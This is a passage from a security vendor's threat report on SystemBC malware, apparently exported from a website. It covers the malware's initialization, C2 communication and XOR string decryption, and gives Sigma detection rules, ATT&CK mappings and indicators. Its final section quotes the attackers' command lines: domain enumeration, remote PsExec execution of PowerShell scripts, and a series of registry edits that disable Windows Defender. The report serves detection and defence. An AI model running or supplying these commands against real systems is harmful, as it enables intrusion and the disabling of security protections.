decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/35.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 20: Initialization Function (New Version)<\/p>\n<p>In the older version of SystemBC, the name of the process will be used as a mutex.  The initialization is fairly similar to the new sample with few differences. The old sample will attempt to find the a2guard.exe process, which is linked to an anti-virus product belonging to Emisoft. If the process is found the sample will exit without establishing a persistence. If start argument is missing, the file will be copied into a random directory under ProgramData.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/36.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 21: Initialization Function (Old Version)<\/p>\n<p>In both samples, if the \u201cstart\u201d argument is missing, a scheduled task will be created from the disk image with \u201cstart\u201d argument.<\/p>\n<h3>C2 Callback<\/h3>\n<p>Before SystemBC calls the C2 server, it will collect some basic information from the host.<\/p>\n<ul>\n<li>Username<\/li>\n<li>The Windows build number for the infected system<\/li>\n<li>A WOW process check (32-bit or 64-bit detection)<\/li>\n<li>The volume serial number<\/li>\n<\/ul>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/37.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 22: RtlGetVersion and IsWow64Process APIs Runtime Resolution (New Version)<\/p>\n<p>In the older version, which has TOR capabilities, the sample is implementing a small TOR client that according to Sophos is likely a C implementation of the open source <a href=\"https:\/\/github.com\/wbenny\/mini-tor\/\" target=\"_blank\" rel=\"noopener\">mini-tor<\/a> written in C++. The C2 communications are then routed via TOR.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/38.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 23: C2 Code (Old Version)<\/p>\n<p>In the newer sample, it is lacking the TOR client code completely and the C2 communications are implemented with sockets over IPV4 TCP protocol and non-standard ports. The XOR routine is called to decrypt the required port number from the .data section inside the binary.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/39.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 24: Call WSAStartup and Decrypt Port Number (New Version)<\/p>\n<p>The malware then continues with the C2 connection, decrypting the IP-address with the same XOR function as well as building the required parameters to make a network connection.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/40.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 25: C2 IP Decryption &amp; Socket Creation (New Version)<\/p>\n<h3>XOR<\/h3>\n<p>Interestingly throughout the old and new samples, the XOR decryption function at offset 0x2C07 is called multiple times for different strings loaded from the memory of the process. The decryption function is looking at the boundaries of the start of the decryption key and the end of the encrypted data section to determine whether a passed string is located inside it and requires decryption or not.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/41.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 26: Decryptor Function<\/p>\n<p>This could suggest that there is support for further obfuscation in SystemBC by encrypting more of the plaintext strings. The XOR decryption key used is 40 bytes long and located at the beginning of a .data section at 0x5000. The C2 details are located immediately after the key.<\/p>\n<p>This kind of XOR function and the configuration have been observed in even <a href=\"https:\/\/twitter.com\/VK_Intel\/status\/1123880277170892800\" target=\"_blank\" rel=\"noopener\">older samples from 2019<\/a>.  The new sample analyzed is very similar to previously observed samples in terms of capability, but as discussed above has a different implementation for initialization and C2. The earliest sample of this SystemBC version was observed at the beginning of January 2021.<\/p>\n<h2>Indicators &amp; Detection<\/h2>\n<h3>Detection<\/h3>\n<p>The below table contains the offensive techniques mentioned within this report mapped to open source detection framework <a href=\"https:\/\/github.com\/SigmaHQ\/sigma\" target=\"_blank\" rel=\"noopener\">Sigma<\/a>. This framework allows the conversion of detection logic in to many formats for use across a wide range of industry detection tooling. A fidelity rating is included within the rules to provide guidance on how to implement these rules within internal scoring and alerting systems.<\/p>\n<p>n.b. &#8211; The fidelity rating may vary dependant on the specifics of your environment<\/p>\n<p>Detection ContextSIGMA RuleFidelityPowerShell Empire Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_susp_powershell_empire_launch.yml\" target=\"_blank\" rel=\"noopener\">Empire PowerShell Launch Parameters<\/a>HighPowerShell Empire Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/powershell\/powershell_suspicious_invocation_generic.yml\" target=\"_blank\" rel=\"noopener\">Suspicious PowerShell Invocations &#8211; Generic<\/a>HighPowerShell Empire Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_powershell_suspicious_parameter_variation.yml\" target=\"_blank\" rel=\"noopener\">Suspicious PowerShell Parameter Substring<\/a> High PowerShell Empire C2 Traffic<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/proxy\/proxy_empire_ua_uri_combos.yml\" target=\"_blank\" rel=\"noopener\">Empire UserAgent URI Combo<\/a>HighNtdsutil Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_susp_ntdsutil.yml\" target=\"_blank\" rel=\"noopener\">Invocation of Active Directory Diagnostic Tool<\/a>High PsExec Lateral Movement<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/other\/win_tool_psexec.yml\" target=\"_blank\" rel=\"noopener\">PsExec Tool Execution<\/a>High PsExec Lateral Movement <a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_psexesvc_start.yml\" target=\"_blank\" rel=\"noopener\">PsExec Service Start<\/a>HighMalicious Script Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/malware\/av_relevant_files.yml\" target=\"_blank\" rel=\"noopener\">Antivirus Relevant File Paths Alerts<\/a>HighComsvcs LSASS Dump<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_process_dump_rundll32_comsvcs.yml\" target=\"_blank\" rel=\"noopener\">Process Dump via Rundll32 and Comsvcs.dll<\/a>HighDisabling Windows Defender<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/other\/win_defender_disabled.yml\" target=\"_blank\" rel=\"noopener\">Windows Defender Threat Detection Disabled<\/a>HighNltest Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_trust_discovery.yml\" target=\"_blank\" rel=\"noopener\">Domain Trust Discovery<\/a>Medium Advanced IP Scanner Execution<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_advanced_ip_scanner.yml\" target=\"_blank\" rel=\"noopener\">Advanced IP Scanner<\/a>MediumNET.exe Domain Enumeration<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_susp_recon_activity.yml\" target=\"_blank\" rel=\"noopener\">Suspicious Reconnaissance Activity<\/a>MediumNET.exe Local Enumeration<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_local_system_owner_account_discovery.yml\" target=\"_blank\" rel=\"noopener\">Local Accounts Discovery<\/a>LowQuick Network Enumeration<a href=\"https:\/\/github.com\/SigmaHQ\/sigma\/blob\/a08571be9107d1c0e216400ffbb89c394fcd2570\/rules\/windows\/process_creation\/win_multiple_suspicious_cli.yml\" target=\"_blank\" rel=\"noopener\">Quick Execution of a Series of Suspicious Commands<\/a>Low<\/p>\n<h3>MITRE ATT&amp;CK<\/h3>\n<p>TacticTechniqueTechnique ID Initial Access  External Remote Services<a href=\"https:\/\/attack.mitre.org\/techniques\/T1133\/\" target=\"_blank\" rel=\"noopener\">T1133<\/a>Valid Accounts: Domain Accounts<a href=\"https:\/\/attack.mitre.org\/techniques\/T1078\/002\/\" target=\"_blank\" rel=\"noopener\">T1078.002<\/a> Trusted Relationship  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1199\/\" target=\"_blank\" rel=\"noopener\">T1199<\/a>Execution Command &amp; Scripting Interpreter: PowerShell<a href=\"https:\/\/attack.mitre.org\/techniques\/T1059\/001\/\" target=\"_blank\" rel=\"noopener\">T1059.001<\/a>Command &amp; Scripting Interpreter: Windows Command Shell<a href=\"https:\/\/attack.mitre.org\/techniques\/T1059\/003\/\" target=\"_blank\" rel=\"noopener\">T1059.003<\/a> Inter-Process Communication: Component Object Model  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1559\/001\/\" target=\"_blank\" rel=\"noopener\">T1559.001<\/a> Native API <a href=\"https:\/\/attack.mitre.org\/techniques\/T1106\/\" target=\"_blank\" rel=\"noopener\">T1106<\/a>Persistence  Scheduled Task\/Job: Scheduled Task <a href=\"https:\/\/attack.mitre.org\/techniques\/T1053\/005\/\" target=\"_blank\" rel=\"noopener\">T1053.005<\/a>Defense Evasion  Obfuscated Files or Information: Software Packing  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1027\/002\/\" target=\"_blank\" rel=\"noopener\">T1027.002<\/a> Process Injection: Portable Executable Injection  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1055\/002\/\" target=\"_blank\" rel=\"noopener\">T1055.002<\/a> Process Injection: Process Hollowing   <a href=\"https:\/\/attack.mitre.org\/techniques\/T1055\/012\/\" target=\"_blank\" rel=\"noopener\">T1055.012<\/a>  Deobfuscate\/Decode Files or Information <a href=\"https:\/\/attack.mitre.org\/techniques\/T1140\/\" target=\"_blank\" rel=\"noopener\">T1140<\/a>  Impair Defenses: Disable or Modify Tools<a href=\"https:\/\/attack.mitre.org\/techniques\/T1562\/001\/\" target=\"_blank\" rel=\"noopener\">T1562.001<\/a>Credential Access Exploitation for Credential Access  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1212\/\" target=\"_blank\" rel=\"noopener\">T1212<\/a>  OS Credential Dumping: LSASS Memory<a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/001\/\" target=\"_blank\" rel=\"noopener\">T1003.001<\/a> OS Credential Dumping: NTDS  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/003\/\" target=\"_blank\" rel=\"noopener\">T1003.003<\/a> Discovery        Account Discovery: Domain Account<a href=\"https:\/\/attack.mitre.org\/techniques\/T1087\/002\/\" target=\"_blank\" rel=\"noopener\">T1087.002<\/a> Domain Trust Discovery   <a href=\"https:\/\/attack.mitre.org\/techniques\/T1482\/\" target=\"_blank\" rel=\"noopener\">T1482<\/a> Network Service Scanning   <a href=\"https:\/\/attack.mitre.org\/techniques\/T1046\/\" target=\"_blank\" rel=\"noopener\">T1046<\/a>  Network Share Discovery<a href=\"https:\/\/attack.mitre.org\/techniques\/T1135\/\" target=\"_blank\" rel=\"noopener\">T1135<\/a>  Permission Groups Discovery: Domain Groups<a href=\"https:\/\/attack.mitre.org\/techniques\/T1069\/002\/\" target=\"_blank\" rel=\"noopener\">T1069.002<\/a>  Remote System Discovery <a href=\"https:\/\/attack.mitre.org\/techniques\/T1018\/\" target=\"_blank\" rel=\"noopener\">T1018<\/a> System Information Discovery<a href=\"https:\/\/attack.mitre.org\/techniques\/T1082\/\" target=\"_blank\" rel=\"noopener\">T1082<\/a> Lateral Movement Lateral Tool Transfer<a href=\"https:\/\/attack.mitre.org\/techniques\/T1570\/\" target=\"_blank\" rel=\"noopener\">T1570<\/a> Remote Services: Remote Desktop Protocol  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1021\/001\/\" target=\"_blank\" rel=\"noopener\">T1021.001<\/a> Remote Services: SMB\/Windows Admin Shares  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1021\/002\/\" target=\"_blank\" rel=\"noopener\">T1021.002<\/a>Command and Control Application Layer Protocol: Web Protocols  <a href=\"https:\/\/attack.mitre.org\/techniques\/T1071\/001\/\" target=\"_blank\" rel=\"noopener\">T1071.001<\/a> Non-Standard Port   <a href=\"https:\/\/attack.mitre.org\/techniques\/T1571\/\" target=\"_blank\" rel=\"noopener\">T1571<\/a><\/p>\n<h3>Files<\/h3>\n<p>File NameContextSHA256a.ps1Enumeration ScriptB953F255F799D43131FAAB437C22B883B0903704 328D58F9AE8111066D7AA1E41.ps1LSASS Dumper03960062388E8068143FB6CAE203DA2954C3A4 3BE3306D0D326F015A14019EFFservers0.batPsexec Execution Script890F5323E870C49C412EECD0417D8E1F22D7FFD B8AED11FAE0810383D7C42B91svchost.exeSystemBC Malware2dc93817039e6fa4fae014e1386cffa7ac35b89feac 59d8abe7f51be1c089580<\/p>\n<h3>IP Addresses<\/h3>\n<p>IP AddressContextLast Observed193.29.104[.]187PowerShell Empire2021-02-2779.110.52[.]9SystemBC2021-02-2723.227.202[.]22SyetemBC2021-02-27<\/p>\n<h3>URLs<\/h3>\n<p>URLLast ObservedhXXps:\/\/fs12n1.sendspace[.]com\/dl\/ 2dcbf9eb9e28920a81febd3f0a8cda84\/ 6039c40226878d2e\/px2kd3\/1.rar2021-02-27hXXps:\/\/fs12n5.sendspace[.]com\/dl\/ 5593c4325c0f9c23cb59661893ae9454\/ 6039c46105fab7d4\/3dugcw\/2.zip2021-02-27<\/p>\n<h3>Malicious Command Lines<\/h3>\n<pre><code class=\"language-bash\">Enumeration:\nping.exe     &lt;hostname&gt;\nnet.exe     group &quot;domain computers&quot; \/domain\nnet.exe     group &quot;domain admins&quot; \/domain\nnet.exe     group &quot;enterprise admins&quot; \/domain\nnet.exe     user &lt;USER&gt; \/domain\nnet1.exe     group &quot;domain computers&quot; \/domain\nnet1.exe     group &quot;domain admins&quot; \/domain\nnet1.exe     group &quot;enterprise admins&quot; \/domain\nnet1.exe     user &lt;USER&gt; \/domain\nnltest.exe \/dclist:\nnltest.exe \/dclist:&lt;DOMAIN&gt;\n\nExecution:\nadvanced_ip_scanner.exe     \/portable &quot;C:\/Users\/&lt;USER&gt;\/Downloads\/&quot; \/lng en_us\npowershell.exe     \npowershell.exe     -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBJA&lt;REDACTED&gt;\niexplore.exe     http:\/\/www.advanced-ip-scanner.com\/link.php?lng=en&amp;ver=2-5-3850&amp;beta=n&amp;page=help\ncmd.exe     \/C &quot;C:\\s$\\Servers0.bat&quot;\npsexec.exe -d \\\\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;&quot; -accepteula -s cmd \/c &quot;powershell.exe -ExecutionPolicy Bypass -file \\\\&lt;share&gt;\\l.ps1&quot;\nC:\\Users\\Public\\Music\\svchost.exe start\n\nDefensive Evasion:\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/v DisableAntiSpyware \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/v DisableAntiVirus \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine&quot; \/v MpEnablePus \/t REG_DWORD \/d 0 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableBehaviorMonitoring \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableIOAVProtection \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableOnAccessProtection \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableRealtimeMonitoring \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableRoutinelyTakingAction \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableScanOnRealtimeEnable \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting&quot; \/v DisableEnhancedNotifications \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v DisableBlockAtFirstSeen \/t REG_DWORD \/d 1 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v SpynetReporting \/t REG_DWORD \/d 0 \/f\nreg.exe     add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v SubmitSamplesConsent \/t REG_DWORD \/d 2 \/f\nreg.exe     delete &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/f<\/code><\/pre>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/&#038;title=Prelude%20to%20Ransomware:%20SystemBC\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Prelude to Ransomware: SystemBC&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/darkgate-rises\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/reverse-engineering-a-lumma-infection\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/machine-learning-driven-malware-analysis\/\">Mehr erfahren<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>Sami Ruohonen<br \/>\nContent<\/p>\n<p>Introduction<br \/>\nIntrusion Technical Detail<br \/>\nWrapper<br \/>\nSystemBC Payload<br \/>\nInitialization<br \/>\nIndicators &#038; Detection<br \/>\nShare this story<\/p>\n<p>Introduction<br \/>\nIn late February 2021, WithSecure\u2019s Managed Detection and Response (MDR) service identified the execution of SystemBC malware as part of a hands on keyboard crimeware intrusion. <\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[330,215,312],"labs_content_type":[320],"class_list":["post-10474","lab_item","type-lab_item","status-publish","hentry","category-endpoint-security","category-ransomware","category-threat-intelligence"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, 